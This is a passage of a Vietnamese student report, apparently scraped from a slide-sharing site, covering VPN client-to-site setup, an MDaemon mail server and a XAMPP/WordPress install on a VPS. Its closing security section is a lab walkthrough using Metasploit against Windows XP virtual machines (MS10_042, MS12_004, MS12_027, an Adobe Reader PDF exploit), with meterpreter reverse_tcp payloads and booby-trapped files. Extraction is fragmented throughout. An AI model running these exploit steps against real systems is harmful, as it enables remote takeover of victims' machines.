đến địa chỉ
Clien2.

96

Và
trên
Client
2
ping
đến
địa
chỉ
Clien1.

Trên Clien1
tiến hành
share
1
folder cho
Clien
2.
Bằng cách
tạo 1 folder

right
click chọn
properties

tab
sharing 
chọn Share
this folder

click
OK.

97

Trên Client
2 vào Start
 run 
gõ //địa chỉ
client
2
(10.0.0.101
) và click
OK.

Đã
thấy
được thư
mục
mà
Client 1 đã
share.

Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.

2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private
server)

 VPS theo lưu lượng là loại hình máy chủ VPS tiện dụng, phù hợp & đem lại
nhiều lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ riêng
với chi phí CỰC THẤP.
 VPS là dịch vụ máy chủ chạy dưới dạng chia sẻ từ 1 tài nguyên server chính
hoạt động như một Dedicated Server. Người quản trị (khách hàng) có quyền
cao nhất để toàn quyền quản trị Server.
 VPS kết nối Internet với 01 IP tĩnh và được cài đặt sẵn hệ điều hành tùy chọn.
VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị giới
hạn số lượng domain.
 VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server,
Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi
nhánh với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật.
 VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy chủ
giảm tối đa chi phí.
 VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian thực
hiện rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.
98

 VPS như một giải pháp dung hòa giữa Web Hosting và Dedicated Server theo
cả nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp cho
các cá nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng biệt,
toàn quyền quản lý với Chi Phí Thấp.

Hình 2.3.2.1 Giao diện Remote Desktop Connection
Thông qua chương trình Remote Desktop Connection ta truy cập vào VPS đã
được thuê để tiến hành cấu hình, triển khai các dịch vụ như trên máy thật.

Hình 2.3.2.2 Giao diện ban đầu khi đăng nhập vào máy chủ VPS
Chúng ta tiến hành nhập User name và Password đã được cung cấp từ bên cho
thuê để truy cập vào.

99

Hình 2.3.2.3 Giao diện khi đã đăng nhập vào máy chủ VPS

2.3.2.1 Mail Server trên máy chủ ảo VPS.
Đăng nhập
máy
ảo

chủ
VPS

bằng công
cụ Remote
Desktop.

100

Đăng nhập
vào

máy

chủ ảo.

Dowload
bộ cài đặt
Mdeamon
và

chạy

file
Setup.exe

Trước tiên, bạn
tải phiên bản
MDaemon Mail
Server mới nhất
và bắt đầu quá
trình
cài
đặt.Bấm "Next"
để tiếp tục.

101

Đánh dấu vào ô
"I have read and
I agree with all
the terms of this
license
agreement"

Chọn đường dẫn
lưu
trữ
của
chương
trình,
mặc định sẽ là ổ
C hệ thống (ổ đĩa
có cài hệ điều
hành Microsoft
Windows).

Lựa chọn phiên
bản cài đặt, nếu
bạn có key đăng
ký thì nhập vào ô
phía dưới. Ở ví
dụ sử dụng là
phiên bản free
hoặc miễn phí 30
ngày của phiên
bản Pro.

102

Tùy chọn các
thông tim phù
hợp với vị trí, ở
đây là VietNam

Điền đúng thông
tin về quy mô của
tổ chức hoặc
công ty.

Sau khi hoàn tất
các bước trên,
chọn "Next" để
bắt đầu cài đặt.

103

Chờ đợi cho quá
trình cài đặt hoàn
tất.

Điền tên Domain
chính xác ví
dụ:nguyendinhdu
y.tk

Điền địa chỉ DNS
chính (Primary)
và dự phòng
(Backup)

104

Giữ nguyên lựa
chọn "Setup
MDaemon as a
system service"

Bấm "Finish" để
kết thúc quá trình
cài đặt và cấu
hình ban đầu, bắt
đầu sử dụng

105

Giao diện sau khi
cài đặt thành
công.

Tạo 1 tài khoảng
mới vào Account

New
Account…

106

Nhập thông tin
vào
Email
address và Email
Password. Click
OK để tạo tài
khoảng Email.

Vào
Mail.

OutLook

107

Cấu hình Out
Look mail để
quán lý mail cho
tài
khoảng
test@nguyendinh
duy.tk. Nhập tên
hiện
thị
vào
Display name và
click Next>

Nhập địa chỉ
Email và Click
Next>

108

Nhập địa chỉ IP
vào 2 ô Incoming
và Outgoing và
click Next.

Nhập tên tài
khoảng và mật
khẩu. Click Next.

109

Click Finish để
hoàn tất cấu hình
quản lý mail cho
tài khoảng test.

Tạo mail để kiểm
ra việc gửi mail
từ tài khoảng test
đến 1 e mail bất
kỳ.

110

Vào mail được
gửi và kiểm tra
Mail.

Xem mail tu tài
khoảng
test@nguyendinh
duy.tk

Trả lời lại Mail
của tài khoảng
test@nguyendinh
duy.tk

111

Vào lại mail của
tài
khoảng
test@nguyendinh
duy.tk và đã nhận
được hồi âm.

Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.

2.3.2.2 Kết Nối VPN thông qua máy chủ ảo VPS.
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần
phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những
người dùng truy cập từ xa có thể được định danh và xác thực; các được
hầm có thể được tạo lập, duy trì và quản lý cho hàng trăm người dùng;
việc định tuyến có thể kiểm soát tất cả luồng lưu lượng qua Gateway,
và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn
cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng
ảo hoạt động đúng đắn. Để đưa ra quyết định đúng lúc triển khai các
kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần
liên quan. Trong chương "Tổng quan về mạng riêng ảo" chúng ta đã
thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều
Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng
112

Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:

Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:
Đăng nhập
vào
máy
chủ ảo VPS
với quyền
quản trị.

113

Vào Start

Programs

Administrat
ive Tools
 Routing
and remote
access để
cấu hình.

Giao diện
Routing
and remote
Access

114

Click chuột
phải
vào
server bà
chọn
Configure
and Enable
Routing
and Remote
Access.

Cửa
sổ
Routing
and remote
access
server setup
wizard hiện
lên ta Click
Next>

115

Ta
chọn
Custom
Configutati
on.

Đánh dấu
vào 2 mục
VPN access
và mục Lan
routing.
Click
Next>

116

Click
Finish để
tiến hành
kích hoạt.

Click Yes
để bắt đầu.

Routing
and Remote
Acces đã
sẵn sàng.

117

Để
cấu
hình dãi địa
chỉ IP khi
các
máy
Client truy
cập
vào
VPN
sẽ
được cấp ta
right click
vào Server
và
chọn
Properties.

Chuyễn
sang tab IP
và
chọn
Static
andress
pool.

118

Nhập dãy
địa chỉ bắt
đầu
vào
Start
IP
address và
dãy địa chỉ
kết
thúc
vvào End
IP address
và
Click
OK để chấp
nhận.

Như
vậy
chúng ta đã
hoàn
tất
cấu
hình
cho phép
có thể truy
cập VPN
vào
máy
chủ. Tiếp
theo ta cần
tào
tài
khoảng để
có thể đăng
nhập vào
máy chủ.
Bằng cách
Right click
vào
My
conputer và
chọn
Manage.

119

Tiếp theo ta
vào System
tools

Local Users
and Groups
 Users

Right Click
vào User và
chọn New
User…

120

Tạo 1 user
và điền tên
user
vào
mục User
name
và
mật khẩu
vào
ô
Password
và nhập lại
mật khẩu
vào
ô
Confim
password.
Click
Create để
tạo user.

Tượng tự
tạo 1 user
khác có tên
là client 2

121

Để User có
quyền truy
cập VPN ta
right click
vào
tài
khoảng cần
cấp quyền
và
chọn
Properties

Sang
tab
Dial-in và
chọn Allow
Access để
cấp quyền
và
click
OK
để
hoàn
tất.
Tương tự
cho user có
tên
là
Client2.

122

Chuẩn bị 2
máy
ảo.
Trên máy
ảo thứ 1 ta
vào Start
Settings
 Network
Connection
s.

Click vào
Create
a
new
Connection
.

123

Hộp thoại
New
Connection
Wizard
hiện lên và
click Next>

Chọn mục
Connect to
the
Network at
my
workplace
và
click
Next>

124

Click chọn
Virual
Private
Network
connection
và
chọn
Next>

Nhập tên
công ty vào
ô company
name
và
click Next>

125

Click Do
not dial the
intial
connection
và
click
Next>

Nhập địa
chỉ IP của
máy
chủ
hoặc
tên
domain đã
đăng ký và
click Next>

126

Chọn
Anyone’s
use và click
Next>

Chọn add a
shortcut to
this
connection
to
my
desktop để
thuận tiện
cho lần kết
nối sau và
click Finish
để hoàn tất.

127

Màn hình
đăng nhập
hiện lên ta
nhập
tên
User
và
Password
cần kết nối
và
click
Connect.

Sau khi kết
nối thành
công
thì
bên
góc
phải màn
hình sẽ có
kết
nối
mạng thứ 2.

128

Double
click vào
biểu tượng
mạng kết
nối

chuyển
sang
tab
Details để
xem
chi
tiết.

Các bước
thực hiện
tương
tự
cho Client
2. Và kết
quả
cho
Client
2
như sau.

129

Trên
Client1 tiến
hành ping
đến địa chỉ
Clien2.

Và
trên
Client
2
ping
đến
địa
chỉ
Clien1.

130

Trên Clien1
tiến hành
share
1
folder cho
Clien
2.
Bằng cách
tạo 1 folder

right
click chọn
properties

tab
sharing 
chọn Share
this folder

click
OK.

Trên Client
2 vào Start
 run 
gõ //địa chỉ
client
2
(10.0.0.101
) và click
OK.

131

Đã
thấy
được thư
mục
mà
Client 1 đã
share.

Như vậy chúng ta đã hoản thành việc cài đặt và cấu hình VPN client to site.

2.3.2.3 Cài đặt và cấu hình Web Server trên VPS.
XAMPP là một bộ công cụ lập trình PHP có thể cài đặt được trên nhiều
nền tảng khác nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ
cross-platform nghĩa là XAMPP có thể chạy trên Windows, Linux,
Mac OS, Solaris, còn các ký tự còn lại mang các ý nghĩa sau:
A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng
dụng web.
M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng được bao gồm trong
XAMPP.
P = PHP – ngôn ngữ lập trình PHP.
P = Perl – ngôn ngữ lập trình Perl.
Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3
Chúng ta
dowload và tiến
hành cài đặt bằng
file
Bạn chọn ngôn
ngữ cài đặt là
English và nhấn
OK để tiếp tục.

132

Bạn nhấn Next ở
màn hình tiếp
theo.

Theo mặc định
XAMPP sẽ được
cài đặt vào ổ C
theo đường dẫn
C:xampp, bạn có
thể nhấn Browse
và chọn đường
dẫn cài đặt khác

133

Bạn nhận chọn
các service kèm
theo XAMPP
trong mục
SERVICE
SECTION sau đó
nhấn Install để
tiếp tục.

Màn hình hiển thị
tiến độ cài đặt
XAMPP hiện ra.

134

Quá trình cài đặt
XAMPP hoàn tất,
bạn nhấn vào nút
Finish kết thúc.

XAMPP sẽ tự
động cài đặt các
service mà bạn đã
chọn ở mục
SERVICE
SECTION bên
trên, đầu tiên là
Apache service.
Tiếp đó là
MySQL service

Quá trình cài đặt
các service hoàn
tất, bạn nhấn OK
để tiếp tục.

135

Bạn nhấn OK ở
màn hình tiếp
theo để bật
XAMPP Control
Panel.
Sau khi cài đặt
xong các bạn
click Start ở mục
Apache và MySql
trong XAMOO
Control Panel
Application.

Vào trình duyệt
web và gõ vào
localhost. Và
chọn ngôn ngữ là
English.

136

Sau khi chọn
ngôn ngữ chúng
ta và click pHp
my admin.

Bạn nhập tên cơ
sở dữ liệu vào ô
create new
database và click
Create để tạo
database.

137

Và Databae đã
được tạo.

Tiếp theo các bạn
vào đường dẫn
cài đặt
xampphtdocs và
copy mã nguồn
wordpress mà
chúng ta đã
dowload trên
internet.

Vào thư mục
wordpress mà
chúng ta vừa mới
copy xong và tìm
file wp-configsample.php và
mở nó lên bằng
word pad.

Tìm và sửa thông
tin lại như hình.

138

Đổi tên file vừa
sửa chửa thành
wp-config.php

Vào đường dần
localhost/wordpre
ss/wpadmin/install.php.
Sau đó điền các
thông tin cần
thiết.

139

Sau đó click Cài
đặt WordPess.

Cấu hình
Wordpress thành
công. Ta Clich
Đăng Nhập.

140

Bạn điền thông
tin vừa thiết lập
vừa rồi và click
Đăng Nhập.

Màn hình sau khi
đăng nhập thành
công.

141

Ta vào Cài đặt 
Tổng Quan
điền địa chỉ
chúng ta muốn
truy cập khi
chúng ta lướt web
vào 2 ô
Wordpress
address và Site
Address.

Và đây là trang
chủ của trang
Web chúng ta khi
vừa tạo xong.

142

Và sau khi đã
trang trí cho trang
web của chúng ta.

Như vậy chúng ta đã hoàn thành việc tạo 1 trang web cho riêng mình.
2.3.3 Bảo mật Windows
2.3.3.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042
Chuẩn

bị

2

máy

ảo:

Windows

XP

(nạn nhân) và
máy

Back

Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
địa chỉ IP trong
bài lab này cho
máy

là:

192.168.1.5

143

Trên máy Back
track

vào

chương

trình

terminal và gõ
lệnh
msfconsole

Tìm

mã

lỗi

bằng công cụ
metaploit bằng
cách gõ lệnh
search
ms10_042

Sau khi seach
được mã lỗi ta
dùng lệnh use
và copy mã lỗi
đã tìm được.

144

Dùng

lệnh

show

options

để biết thêm
các câu lệnh
cần thiết.

Dùng

lệnh

SRVHOST
<địa chỉ ip
máy
backtrack>
Dùng lệnh set
PAYLOAD
windows/meter
preter/preverse
_tcp
Dùng lệnh set
LHOST

<ip

backtrack>

145

Dùng

lệnh

exploit để tiến
hành khai thác
lỗi.

Chú

ý

đường

dẫn

http://192.168.
nếu

1.5:80/

máy nạn nhân
vào đường dẫn
này sẽ bị hack.
Trở

lại

máy

Windows XP.
Kiểm tra địa
chỉ IP máy XP.
Với địa chỉ ip
máy

XP

là

192.168.1.6

Trên máy XP
ta

vào

trình

duyệt web và
gõ đường dẫn
http://192.168.
1.5:80/

146

Trên máy XP
tự động xuất
hiện hộp thoại
Help

and

Support.

Trên máy Back
Track bắt đầu
nhận thấy có
sự kết nối đến
địa

chỉ

http://192.168.
1.5:80/

Và nhận thấy
có

địa

chỉ

192.168.1.6 kết
nối vào. Và tạo
phiên kết nối
vào nó.

147

Trên máy back
track ta gõ lệnh
sessions

để

kiểm tra.
Dùng

lệnh

sessions –i 1

Dùng

lệnh

sysinfo để xem
thông tin máy
nạn nhân. Và
như vậy ta đã
khai thác thành
công lỗ hổng
MS10_042
trên máy XP.

2.3.3.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004
Chuẩn bị 2
máy

ảo:

Windows
XP
nhân)

(nạn
và

máy Back
Track 5r3
(máy

tấn

công

nạn

nhân)

148

Trên

máy

Back
Track cấu
hình

địa

chỉ

IP

trong

bài

lab

này

cho

máy

là:
192.168.1.
5
Trên

máy

Back track
vào
chương
trình
terminal và
gõ

lệnh

msfconsole

149

Tìm mã lỗi
bằng công
cụ
metaploit
bằng cách
gõ

lệnh

search
ms12_004

Sau

khi

seach được
mã lỗi ta
dùng lệnh
use

và

copy

mã

lỗi đã tìm
được.

150

Dùng lệnh
show
options để
biết

thêm

các

câu

lệnh

cần

thiết.

Dùng lệnh
SRVHOST
<địa
ip

chỉ
máy

backtrack>
Dùng lệnh
set
PAYLOA
D
windows/
meterprete
r/preverse_
tcp
Dùng lệnh
set LHOST
<ip

151

backtrack>
Dùng lệnh
exploit để
tiến

hành

khai

thác

lỗi. Chú ý
đường dẫn
http://192.
168.1.5:80
80/

nếu

máy

nạn

nhân

vào

đường dẫn
này sẽ bị
hack.
Trở

lại

máy
Windows
XP. Kiểm
tra địa chỉ
IP

máy

XP.

Với

địa chỉ ip
máy XP là
192.168.1.
6

152

Trên

máy

XP ta vào
trình duyệt
web và gõ
đường dẫn
http://192.
168.1.5:80/
Trên

máy

XP tự động
xuất

hiện

hộp

thoại

yêu

cầu

chạy
Windows
Media
Player.
Nếu

chọn

Run sẽ bị
hack.
Trên

máy

Back
Track
đầu

bắt
nhận

thấy có sự
kết nối đến
địa

chỉ

http://192.
168.1.5:80
80/
153

Và

nhận

thấy có địa
chỉ
192.168.1.
6 kết nối
vào. Và tạo
phiên

kết

nối vào nó.
Dùng lệnh
sessions –i
1
Dùng lệnh
sysinfo để
xem thông
tin

máy

nạn nhân.
Và

như

vậy ta đã
khai

thác

thành công
lỗ

hổng

MS12_004
trên

máy

XP.

154

2.3.3.3 Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X
Chuẩn

bị

2

máy

ảo:

Windows

XP

(nạn nhân) và
máy

Back

Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
bài lab này cho
máy

là:

192.168.1.5
Trên máy Back
track
chương

vào
trình

terminal và gõ
lệnh
msfconsole

155

Tìm

mã

lỗi

bằng công cụ
metaploit bằng
cách gõ lệnh
user
exploit/windo
ws/fileformat/a
dobe_pdf_emb
edded_exe
Dùng

lệnh

show

options

để biết thêm
các câu lệnh
cần thiết.

Dùng

lệnh

FILENAMET
ênFile
Dùng lệnh set
INFILENAME
Đường_Dẫn_
file_pdf_bất_k
ỳ.
Dùng lệnh set
PAYLOAD
windows/meter

156

preter/reverse_
tcp để sử dụng
mã độc.
Dùng lệnh set
LHOSTip_ba
cktrack.
Dùng

lệnh

setLPORTp
ort_tùy_ý_muố
n_mở
Dùng

lệnh

exploit để tiến
hành khai thác
lỗi. .

Copy file đã
tiêm mã độc ra
Desktop.
Copy file có
mã

độc

vào

máy Windows
XP bằng lệnh
copy và past
vào máy XP.

157

Trên

máy

BackTrack

sẽ

lắn nghe kết
nối bằng cách
sử dụng lệnh
user
exploit/multi/h
ander.
Sau

đó

set

LHOTip_bac
ktrack
Set

LPORT

như_khai_bá
o_port_trên.
Sau đó dùng
lệnh exploit để
lắng nghe.
Trên máy XP
tiến hành đọc
file có mã độc
và xuất hiện
hộp thoại. Nếu
Click Open sẽ
bị hack.
Trên máy Back
track gõ lệnh
getuid để xem

158

tên máy.
Gõ

lệnh

sysinfo để xem
thông tin máy
nạn nhân. Như
vậy chúng ta
đã hoàn thành
khai thác lỗi
trên

Adobe

Reader 9.X

2.3.3.4 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027
Chuẩn

bị

2

máy

ảo:

Windows

XP

(nạn nhân) và
máy

Back

Track 5r3 (máy
tấn công nạn
nhân)
Trên máy Back
Track cấu hình
bài lab này cho
máy

là:

192.168.1.5

159

Trên máy Back
track

vào

chương

trình

terminal và gõ
lệnh
msfconsole

Tìm

mã

lỗi

bằng công cụ
metaploit bằng
cách gõ lệnh
search
ms12_027
Sau khi seach
được mã lỗi ta
dùng lệnh use
và copy mã lỗi
đã tìm được.

160

Dùng

lệnh

show

options

để biết thêm
các câu lệnh
cần thiết.

Dùng

lệnh

setFILENAM
Etên_file.
Dùng lệnh set
PAYLOAD
windows/meter
preter/preverse
_tcp
Dùng lệnh set
LHOST <địa
chỉ

ip

máy

backtrack>
Dùng

lệnh

exploit để khai
thác lỗi.

161

Copy file đã
tiêm mã độc ra
ngoài

màng

hình

destop

bằng

lệnh

cpđường_dẫn
file
nguồnđường
dẫn_fil_ đích
Dùng

lệnh

use/exploit/mul
ti/handler
Dùng lệnh set
PAYLOAD
windows/meter
preter/reverse_
tcp
Dùng lệnh set
LHOST

<ip

backtrack>
Dùng lệnh set
LHOSTip_ba
ck_track

Dùng

lệnh

exploit để bắt
đầu lắng nghe.

162

Trên máy Back
track copy file
đã có mã độc ở
ngoài desktop
vào

var/www

để nạn nhân
dowload về.
Khởi
dịch

động
vụ

aphache

trên

Backtrack
bằng

lệnh

/etc/init.d/apac
he2 start
Trên máy XP
ta

vào

trình

duyệt web để
dowload file ta
đã up trên máy
back

track

bằng cách gõ:
192.168.1.5/du
y11145941.doc

163

Xuất hiện hộp
thoại và nhấn
Save

để

dowload

Khi máy XP
mở file word
có nhiễm mã
độc thì sẽ bị
hack.

Bênh

máy

Back track đã
nhận thấy 1 kết
nối

và

tạo

phiên kết nối
với nạn nhân.
Dùng

lệnh

sysinfo

để

kiểm tra. Như
vậy ta đã hoàn
thành khai thác
lỗi MS12_027
trên win XP.

164

2.4 Các kết quả đạt được
Sau khi tìm hiểu và triển khai các dịch vụ trên máy ảo VMWare và VPS em đã
có kiến thức về:
- Nguyên lý cơ bản của hệ điều hành mạ
ứ
ạng, có kỹ
năng cần thiết để cài đặ
ỉnh mạng doanh nghiệp cỡ vừa và
lớn dựa vào Windows Server 2008.
- Hiểu về cấu trúc hạ tầng, thiết kế và quản trị hệ thống mạ
ụ quả
ợ
.
- Triển khai, thiết kế, quản lý và chuẩn đoán hỏng hóc cho một hệ thống mạng.
- Có các kiến thức trên nền tảng công nghệ Windows Server 2008.
2.4.1 Kinh nghiệm thực tế
Có cái nhìn thực tế về việc cấu hình, quản lý một hệ thống mạng của
một doanh nghiệp thông qua nền tảng.
Được trực tiếp tiếp xúc những công nghệ và thiết bị mà trước đây chỉ
biết đến thông qua sách vở.
Được vận dụng những kiến thức tiếp thu trên lớp vào công việc thực tế.
Bổ sung và trau dồi những thiếu sót về kiến thức trong quá trình học
trên lớp.
Trực tiếp triển khai và cấu hình trên máy chủ ảo VPS.
Có kinh nghiệm trong việc khắc phục sự cố khi hệ thống gặp lỗi.
2.4.2 Hoàn thiện bản thân
Các thành viên trong nhóm đã định hướng rõ ràng mục tiêu sắp tới sẽ
làm.
Tự tin hơn trong việc giao tiếp với mọi người trong công việc.
Nâng cao khả năng làm việc nhóm cũng như khả năng tự bản thân giải
quyết vấn đề khó khăn gặp phải trong công việc.
2.4.3 Các kiến thức được lĩnh hội
Kiến thức thực tế về hệ thống mạng của doanh nghiệp.
Hiểu các thành phần công nghệ mạng doanh nghiệp vừa và nhỏ.

165

Bao cao ck update final

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Was ist angesagt?

Was ist angesagt? (19)

Andere mochten auch

Andere mochten auch (12)

Ähnlich wie Bao cao ck update final

Ähnlich wie Bao cao ck update final (20)

Bao cao ck update final